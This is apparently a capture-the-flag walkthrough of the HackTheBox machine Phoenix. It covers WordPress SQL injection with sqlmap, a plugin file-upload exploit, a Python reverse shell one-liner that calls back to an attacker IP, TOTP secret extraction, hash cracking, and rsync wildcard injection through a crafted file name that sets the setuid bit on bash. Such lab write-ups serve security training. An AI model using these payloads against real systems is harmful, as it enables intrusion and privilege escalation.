CTF-Writeups/HackTheBox/Phoenix.md

HackTheBox-Phoenix

NMAP

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http     Apache httpd 
| http-methods:                     
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache          
|_http-title: Did not follow redirect to https://phoenix.htb/       
443/tcp  open  ssl/http Apache httpd         
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-server-header: Apache
|_http-title: Did not follow redirect to https://phoenix.htb/
| ssl-cert: Subject: commonName=phoenix.htb/organizationName=Phoenix Security Ltd./stateOrProvinceName=Arizona/countryName=US
| Issuer: commonName=phoenix.htb/organizationName=Phoenix Security Ltd./stateOrProvinceName=Arizona/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-02-15T20:08:43
| Not valid after:  2032-02-13T20:08:43
| MD5:   320f c0ee 2f18 bd78 3abc e9d8 66a6 fc26
|_SHA-1: 6879 3f3b c7d3 a517 6785 bcc7 a726 51ce 8827 4a68
| tls-alpn: 
|_  http/1.1
8888/tcp open  http     SimpleHTTPServer 0.6 (Python 3.8.10)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

PORT 80/443 (HTTP/HTTPS)

Visting port 80 it's going to redirect us to port 443 on phoenix.htb domain so let's add this to hosts file

We can see the results of wappalyzer extension that it's using wordpress cms

Checking the /wp-admin page we'll be presented to a login page which has a signup option also we can checkout forums as well

On the forums we can see there are 5 users, which can be helpful in bruteforcing in login

As we can signup, so let's try creating a user

After logging in we can see the dashboard of wordpress but we are not really a privileged user so can't really see anything else other than blogs

Although we can see a plugin named Pie Register

For this plugin was a sqli vulnerability in two different versions

There wasn't any poc for this version, but there was a poc for the other version

So for checking the version, I ran wpscan to find out the version all to check if there were any other plugins installed

wpscan --url https://phoenix.htb --disable-tls-checks -e ap -v

This is using 3.7.4.3 which isn't vulnerable but we do see other plugins out of which I found , after checking for vulnerabilties in these plugins asgaros-forum was having a blind sqli in version < 1.15.13 and the version installed on wordpress was 1.15.12

Running this payload it does indeed work and refreshes the page after 10 seconds but since it's a blind sqli it's really hard to exploit it manually so I ran sqlmap but it wasn't able to indentify the GET parameter vulnerable to sqli

So trying it again with --level=2 and --risk=2

sqlmap -u "https://phoenix.htb/forum/?subscribe_topic=1" --level=2 --risk=2 --batch

And after waiting for a while it turns out that it's time-based blind sqli so it's going to take a really long time in dumping data from tables

Now dumping the database was taking way too long

So we could dump the table which only has the name of the plugins to do that I looked up on google and found the question asked on stackoverflow

But it's still going to take a lot of time in dumping rows and columns, so on researching more into wp_options I came to know that we can query for active plugins active_plugins in column name option_name by selecting wp_value in wp_options table

https://stackoverflow.com/questions/2624551/wordpress-deactivate-a-plugin-via-database

We can provide the sql query through --sql-query

sqlmap -u "https://phoenix.htb/forum/?subscribe_topic=1" --level=2 --risk=2 --sql-query="SELECT optio
n_value FROM wp_options WHERE option_name = 'active_plugins';" --batch 

After letting this query run, it showed four plugins

• accordion-slider-gallery
• adminimize
• asgaros-forum
• download-from-files

Foothold

I tried checking exploits for accordion and adminize but they were way too old so I looked up exploit on download-from-files and it was having a recent vulnerability regarding arbitary file upload

https://www.exploit-db.com/exploits/50287

To exploit this, we need to make a php file with a extension .phtml

After running the exploit it's going to give us an error regarding verfication of the ssl certificate and would fail to make a request, so we need to add verify=false when making a GET and POST request to phoenix.htb

And after making those changes it should upload the php file

Using a python3 one liner to get a reverse shell

python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.124",2222));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

After getting a shell, stabilizing it through stty raw -echo and fg

Being in wordpress directory, we can read the database password from wp-config.php

But when trying to change user it's going to ask us a verification code

So there's a 2FA but I wasn't able to find any secret with which I could generate the TOTP or OTP so I decide to look around and found a plugin in wordpress plugins

Googling about this plugin, it seems that it's used a SSO (Single Sign On) used with multiple application

Using the db creds found with mysql, we can login to the database and view the tables

Reading the data from wp_usermeta we can find the TOTP key

In order to use this secret to generate TOTP we need to use oathtool

With this we generated TOTP which we can use for the verification, I tried for both users but it failed

Privilege Escalation (editor)

Searching about where the configuration for google authenticator is and seems that there's a PAM module configured with ssh

https://wiki.archlinux.org/title/Google_Authenticator

From the /etc/pam.d/sshd file we can see is required in ssh

Also looking at /etc/security/access-local.conf the IP 10.11.12.13 is allowed not be asked for 2FA according to the documentation for google authenticator from the arch wiki

After figuiring this out still the password doesn't work on these two users, so I checked the database again for password hashes and try cracking them

This cracked the 3 hashes so trying these for the users on the box through ssh as on switching users it will ask for verification code and we already saw that it won't ask for verification if the connection is comming from 10.11.12.13

The password superphoenix worked for editor user

But doing sudo -l it's going to again ask for verification code

Checking on which directories we have access to writing somewhere

Here we can see a backup of something which is being ran with a difference of 3 minutes

Unzipping the archive to see what the backup is of

This gives a file named dbbackup.sql

And it is only taking backup of table's structrue of wordpress database

Here I fell into another rabbit hole for mysqldump CVE which was found in 2016 so I again wasted my time going down that rabbit hole, after spending hours tried running pspy but it wasn't showing processes as any other user

Running it with -f showed us a binary named cron.sh.x that was being called

We couldn't check what and how the commands were being ran, so running it with the current user and checking pspy it should the commands that the binary was running in the background as a root user

NOW=$(date +"%Y-%m-%d-%H-%M")
FILE="phoenix.htb.$NOW.tar"
cd /backups          
mysqldump -u root wordpress > dbbackup.sql
tar -cf $FILE dbbackup.sql && rm dbbackup.sql
gzip -9 $FILE
find . -type f -mmin +30 -delete     
rsync --ignore-existing -t *.* jit@10.11.12.14:/backups/ 

This explains about the mysqldump that was being created in /backups folder, to break down this script

1. This script is first urnning the data command and saving it in NOW variable
2. FILE variable is having the archive name with the time timestamp
3. It's switching to /backups directoy
4. Running mysqldump to create a dump of wordpress database and saving it in dbbackup.sql file
5. Creating a tar archive of dbbackup.sql file and removing it
6. Creating gzip archive out of tar archive
7. Running find command to check if the file was modified in the last 30 minutes if it was then it deletes the file
8. And in the end it's using rsync which is used for transferring files remotely and here it's vulnerable to command injection because it has *.* meaning that i's transferring every file from the /backups directory

Referring to an awesome blog post on command injection there was technique for rsync

https://betterprogramming.pub/becoming-root-with-wildcard-injections-on-linux-2dc94032abeb

We can create a bash scipt having the contents

chmod +s /bin/bash

And creating a file which will be the argument for rsync for the remote commands to be executed via a script

touch -- "-e sh script.sh"

Checking the permissions on the bash binary

Rerefences

• https://wpscan.com/vulnerability/36cc5151-1d5e-4874-bcec-3b6326235db1
• https://stackoverflow.com/questions/6219618/where-is-plugin-data-stored-in-the-database
• https://stackoverflow.com/questions/2624551/wordpress-deactivate-a-plugin-via-database
• https://wordpress.stackexchange.com/questions/286759/how-do-i-check-what-plugins-are-enabled-via-the-database
• https://www.exploit-db.com/exploits/50287
• https://stackoverflow.com/questions/51768496/why-do-https-requests-produce-ssl-certificate-verify-failed-error
• https://wiki.archlinux.org/title/Google_Authenticator
• https://betterprogramming.pub/becoming-root-with-wildcard-injections-on-linux-2dc94032abeb